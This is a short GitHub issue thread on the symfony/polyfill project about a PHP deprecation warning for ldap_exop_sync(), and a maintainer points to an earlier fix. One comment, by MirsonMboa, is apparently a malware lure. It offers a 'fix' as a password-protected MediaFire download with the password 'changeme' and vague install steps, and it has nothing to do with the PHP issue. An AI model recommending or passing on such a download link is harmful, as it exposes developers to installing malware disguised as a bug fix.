### ISSUE TITLE
ldap_exop_sync(): Implicitly marking parameter $request_data as nullable is deprecated

### ISSUE THREAD

**Issue by shyim** [symfony/polyfill#490]
```
PHP Deprecated:  ldap_exop_sync(): Implicitly marking parameter $request_data as nullable is deprecated, the explicit nullable type must be used instead in /Users/shyim/Developer/sw-trunk/vendor/symfony/polyfill-php83/bootstrap.php on line 43

```

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by derrabus** [comment]
This should've been fixed in #467. Can you please check which version of the polyfill you are using?

**Comment by shyim** [comment]
whoopsie you are right
